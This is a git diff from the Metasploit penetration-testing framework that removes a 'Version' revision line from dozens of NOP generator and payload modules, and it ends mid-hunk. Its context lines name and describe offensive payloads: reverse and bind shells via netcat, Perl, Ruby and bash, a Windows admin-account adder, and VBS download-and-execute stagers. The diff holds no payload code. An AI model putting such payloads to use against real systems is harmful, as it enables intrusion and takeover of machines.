a/modules/nops/armle/simple.rb b/modules/nops/armle/simple.rb index 3d55a37a69..29dd960512 100644 --- a/modules/nops/armle/simple.rb +++ b/modules/nops/armle/simple.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Nop super( 'Name' => 'Simple', 'Alias' => 'armle_simple', - 'Version' => '$Revision$', 'Description' => 'Simple NOP generator', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/nops/php/generic.rb b/modules/nops/php/generic.rb index 602fa44946..a6d39d39c1 100644 --- a/modules/nops/php/generic.rb +++ b/modules/nops/php/generic.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Nop super( 'Name' => 'PHP Nop Generator', 'Alias' => 'php_generic', - 'Version' => '$Revision$', 'Description' => 'Generates harmless padding for PHP scripts', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index 64e60fe345..ae5b9edc0b 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Nop super( 'Name' => 'Simple', 'Alias' => 'ppc_simple', - 'Version' => '$Revision$', 'Description' => 'Simple NOP generator', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index 26caa3e121..1732cc8597 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -77,7 +77,6 @@ class Metasploit3 < Msf::Nop super( 'Name' => 'SPARC NOP Generator', 'Alias' => 'sparc_simple', - 'Version' => '$Revision$', 'Description' => 'SPARC NOP generator', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/nops/tty/generic.rb b/modules/nops/tty/generic.rb index 177669cff9..99bb3e498a 100644 --- a/modules/nops/tty/generic.rb +++ b/modules/nops/tty/generic.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Nop super( 'Name' => 'TTY Nop Generator', 'Alias' => 'tty_generic', - 'Version' => '$Revision$', 'Description' => 'Generates harmless padding for TTY input', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/nops/x64/simple.rb b/modules/nops/x64/simple.rb index 40f2dbfa83..b475feffb3 100644 --- a/modules/nops/x64/simple.rb +++ b/modules/nops/x64/simple.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Nop super( 'Name' => 'Simple', 'Alias' => 'x64_simple', - 'Version' => '$Revision$', 'Description' => 'An x64 single/multi byte NOP instruction generator.', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index c0ec17e6a0..7ec5abe9cf 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Nop def initialize super( 'Name' => 'Opty2', - 'Version' => '$Revision$', 'Description' => 'Opty2 multi-byte NOP generator', 'Author' => [ 'spoonm', 'optyx' ], 'License' => MSF_LICENSE, diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index 3dba13f0c1..e362e4f33e 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -84,7 +84,6 @@ SINGLE_BYTE_SLED = super( 'Name' => 'Single Byte', 'Alias' => 'ia32_singlebyte', - 'Version' => '$Revision$', 'Description' => 'Single-byte NOP generator', 'Author' => 'spoonm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb index e66c898fb1..b66f76ab28 100644 --- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'AIX Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/aix/ppc/shell_find_port.rb b/modules/payloads/singles/aix/ppc/shell_find_port.rb index d92ed471ad..457e8c7d20 100644 --- a/modules/payloads/singles/aix/ppc/shell_find_port.rb +++ b/modules/payloads/singles/aix/ppc/shell_find_port.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'AIX Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/aix/ppc/shell_interact.rb b/modules/payloads/singles/aix/ppc/shell_interact.rb index a13c17fd9d..39c6f55acc 100644 --- a/modules/payloads/singles/aix/ppc/shell_interact.rb +++ b/modules/payloads/singles/aix/ppc/shell_interact.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'AIX execve shell for inetd', - 'Version' => '$Revision$', 'Description' => 'Simply execve /bin/sh (for inetd programs)', 'Author' => 'jduck', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb index 8516aa14c7..bfd0c3da16 100644 --- a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'AIX Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb index 76d5326ac6..9ec4d4f7e0 100644 --- a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb index 85bb4003b9..0b154a7178 100644 --- a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/exec.rb b/modules/payloads/singles/bsd/x86/exec.rb index c93fb05aa0..7c75882773 100644 --- a/modules/payloads/singles/bsd/x86/exec.rb +++ b/modules/payloads/singles/bsd/x86/exec.rb @@ -25,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => 'vlad902', 'License' => MSF_LICENSE, @@ -50,7 +49,6 @@ module Metasploit3 ; Name: single_exec ; Platforms: *BSD ; Author: vlad902 -; Version: $Revision$ ; License: ; ; This file is part of the Metasploit Exploit Framework diff --git a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb index 96adfcc486..0e6a470ab3 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb @@ -20,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'FreeBSD Meterpreter Service, Bind TCP', - 'Version' => '$Revision$', 'Description' => 'Stub payload for interacting with a Meterpreter Service', 'Author' => 'hdm', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb index 1b20d8a914..3e163e398a 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb @@ -20,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'FreeBSD Meterpreter Service, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Stub payload for interacting with a Meterpreter Service', 'Author' => 'hdm', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb index c0a18c8f59..07a58c0f0a 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb index c37c6bbde0..58541dd844 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Bind TCP Inline (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell over IPv6', 'Author' => ['skape', 'vlad902', 'hdm'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/shell_find_port.rb b/modules/payloads/singles/bsd/x86/shell_find_port.rb index fd787313f7..56c8f83983 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_port.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/shell_find_tag.rb b/modules/payloads/singles/bsd/x86/shell_find_tag.rb index 08b849d867..1f39047450 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_tag.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_tag.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Find Tag Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection (proxy/nat safe)', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb index ae8bd3b9e7..81b283ce99 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb index 226268102f..a17bd86663 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Reverse TCP Inline (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell over IPv6', 'Author' => [ 'skape', 'vlad902', 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb index 54c2206d5d..c72aff9211 100644 --- a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSDi Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => [ 'skape', 'optyx' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsdi/x86/shell_find_port.rb b/modules/payloads/singles/bsdi/x86/shell_find_port.rb index 1eee2d58d0..de0b83a149 100644 --- a/modules/payloads/singles/bsdi/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsdi/x86/shell_find_port.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSDi Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => [ 'skape', 'optyx' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb index 15313de703..903fde9e49 100644 --- a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSDi Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => [ 'skape', 'optyx' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_inetd.rb b/modules/payloads/singles/cmd/unix/bind_inetd.rb index 0ab4e031b5..e8810c84b4 100644 --- a/modules/payloads/singles/cmd/unix/bind_inetd.rb +++ b/modules/payloads/singles/cmd/unix/bind_inetd.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (inetd)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell (persistent)', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_netcat.rb b/modules/payloads/singles/cmd/unix/bind_netcat.rb index 6cdcc0e8cf..cb4d8dbc38 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via netcat -e)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via netcat', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb index 5672706519..f5c4d05675 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via netcat -e) IPv6', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via netcat', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_perl.rb b/modules/payloads/singles/cmd/unix/bind_perl.rb index a0f431af9f..f0361c6406 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via Perl)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via perl', 'Author' => ['Samy ', 'cazz'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb index c08b96aaed..6ec83ad666 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via perl) IPv6', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via perl', 'Author' => ['Samy ', 'cazz'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_ruby.rb b/modules/payloads/singles/cmd/unix/bind_ruby.rb index a08f2c29d6..ba3f797be6 100644 --- a/modules/payloads/singles/cmd/unix/bind_ruby.rb +++ b/modules/payloads/singles/cmd/unix/bind_ruby.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via Ruby)', - 'Version' => '$Revision$', 'Description' => 'Continually listen for a connection and spawn a command shell via Ruby', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb index a6fe97b8ea..a6c85ad106 100644 --- a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via Ruby) IPv6', - 'Version' => '$Revision$', 'Description' => 'Continually listen for a connection and spawn a command shell via Ruby', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/generic.rb b/modules/payloads/singles/cmd/unix/generic.rb index 379f4c51bc..a220a01a9f 100644 --- a/modules/payloads/singles/cmd/unix/generic.rb +++ b/modules/payloads/singles/cmd/unix/generic.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command, Generic Command Execution', - 'Version' => '$Revision$', 'Description' => 'Executes the supplied command', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/interact.rb b/modules/payloads/singles/cmd/unix/interact.rb index dd04b96158..c031b2f2cd 100644 --- a/modules/payloads/singles/cmd/unix/interact.rb +++ b/modules/payloads/singles/cmd/unix/interact.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command, Interact with Established Connection', - 'Version' => '$Revision$', 'Description' => 'Interacts with a shell on an established socket connection', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse.rb b/modules/payloads/singles/cmd/unix/reverse.rb index d4e63fc555..424680677b 100644 --- a/modules/payloads/singles/cmd/unix/reverse.rb +++ b/modules/payloads/singles/cmd/unix/reverse.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Double reverse TCP (telnet)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell through two inbound connections', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse_bash.rb b/modules/payloads/singles/cmd/unix/reverse_bash.rb index c2dc4fe1b5..c34894c110 100644 --- a/modules/payloads/singles/cmd/unix/reverse_bash.rb +++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP (/dev/tcp)', - 'Version' => '$Revision$', 'Description' => %q{ Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat.rb b/modules/payloads/singles/cmd/unix/reverse_netcat.rb index 1a0caf787d..fd84a11d48 100644 --- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb +++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP (via netcat -e)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via netcat', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse_perl.rb b/modules/payloads/singles/cmd/unix/reverse_perl.rb index 5fed27b432..4e39a0a0a6 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP (via Perl)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via perl', 'Author' => 'cazz', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby.rb b/modules/payloads/singles/cmd/unix/reverse_ruby.rb index 2dc9b88f12..d6f75cec7e 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ruby.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ruby.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP (via Ruby)', - 'Version' => '$Revision$', 'Description' => 'Connect back and create a command shell via Ruby', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/windows/adduser.rb b/modules/payloads/singles/cmd/windows/adduser.rb index bd932f2099..2af7ce073f 100644 --- a/modules/payloads/singles/cmd/windows/adduser.rb +++ b/modules/payloads/singles/cmd/windows/adduser.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Execute net user /ADD CMD', - 'Version' => '$Revision$', 'Description' => %q{ Create a new user and add them to local administration group. diff --git a/modules/payloads/singles/cmd/windows/bind_perl.rb b/modules/payloads/singles/cmd/windows/bind_perl.rb index 8c0000aa46..8a30eda1d6 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell, Bind TCP (via Perl)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)', 'Author' => ['Samy ', 'cazz', 'patrick'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb index 21014511e9..b45a80c79f 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell, Bind TCP (via perl) IPv6', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)', 'Author' => ['Samy ', 'cazz', 'patrick'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/windows/bind_ruby.rb b/modules/payloads/singles/cmd/windows/bind_ruby.rb index 8f619eecfa..40938e1770 100644 --- a/modules/payloads/singles/cmd/windows/bind_ruby.rb +++ b/modules/payloads/singles/cmd/windows/bind_ruby.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell, Bind TCP (via Ruby)', - 'Version' => '$Revision$', 'Description' => 'Continually listen for a connection and spawn a command shell via Ruby', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb index 3e0b8438a1..1fbb3e6b21 100644 --- a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Executable Download and Evaluate VBS', - 'Version' => '$Revision$', 'Description' => 'Downloads a file from an HTTP(S) URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line. ', 'Author' => 'scriptjunkie', diff --git a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb index 82e610922f..57c179bfca 100644 --- a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Executable Download and Execute (via .vbs)', - 'Version' => '$Revision$', 'Description' => 'Download an EXE from an HTTP(S) URL and execute it', 'Author' => 'scriptjunkie', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index 7e150d657a..37bb01b97d 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command, Double reverse TCP connection (via Perl)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via perl', 'Author' => ['cazz', 'patrick'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/windows/reverse_ruby.rb b/modules/payloads/singles/cmd/windows/reverse_ruby.rb index 7f71cd3001..5f623a9f28 100644 --- a/modules/payloads/singles/cmd/windows/reverse_ruby.rb +++ b/modules/payloads/singles/cmd/windows/reverse_ruby.rb @@ -18,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell, Reverse TCP (via Ruby)', - 'Version' => '$Revision$', 'Description' => 'Connect back and create a command shell via Ruby', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/generic/custom.rb b/modules/payloads/singles/generic/custom.rb index cd49cb226c..68c0da9d21 100644 --- a/modules/payloads/singles/generic/custom.rb +++ b/modules/payloads/singles/generic/custom.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Custom Payload', - 'Version' => '$Revision$', 'Description' => 'Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR.', 'Author' => 'scriptjunkie ', diff --git a/modules/payloads/singles/generic/debug_trap.rb b/modules/payloads/singles/generic/debug_trap.rb index 31777a8380..ad12644bd4 100644 --- a/modules/payloads/singles/generic/debug_trap.rb +++ b/modules/payloads/singles/generic/debug_trap.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Generic x86 Debug Trap', - 'Version' => '$Revision$', 'Description' => 'Generate a debug trap in the target process', 'Author' => 'robert ', 'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ], diff --git a/modules/payloads/singles/generic/shell_bind_tcp.rb b/modules/payloads/singles/generic/shell_bind_tcp.rb index 9abb11086d..e175e8740b 100644 --- a/modules/payloads/singles/generic/shell_bind_tcp.rb +++ b/modules/payloads/singles/generic/shell_bind_tcp.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Generic Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/generic/shell_reverse_tcp.rb b/modules/payloads/singles/generic/shell_reverse_tcp.rb index ad59e07cf3..90bb47a350 100644 --- a/modules/payloads/singles/generic/shell_reverse_tcp.rb +++ b/modules/payloads/singles/generic/shell_reverse_tcp.rb @@ -17,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Generic Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/generic/tight_loop.rb b/modules/payloads/singles/generic/tight_loop.rb index 55b7ed0487..de6146b2e9 100644 --- a/modules/payloads/singles/generic/tight_loop.rb +++ b/modules/payloads/singles/generic/tight_loop.rb @@ -15,7 +15,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Generic x86 Tight Loop', - 'Version' => '$Revision$', 'Description' => 'Generate a tight loop in the target process', 'Author' => 'jduck', 'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ], diff --git a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb index 81c06e1c2f..0f38f7a307 100644 --- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb @@ -18,7 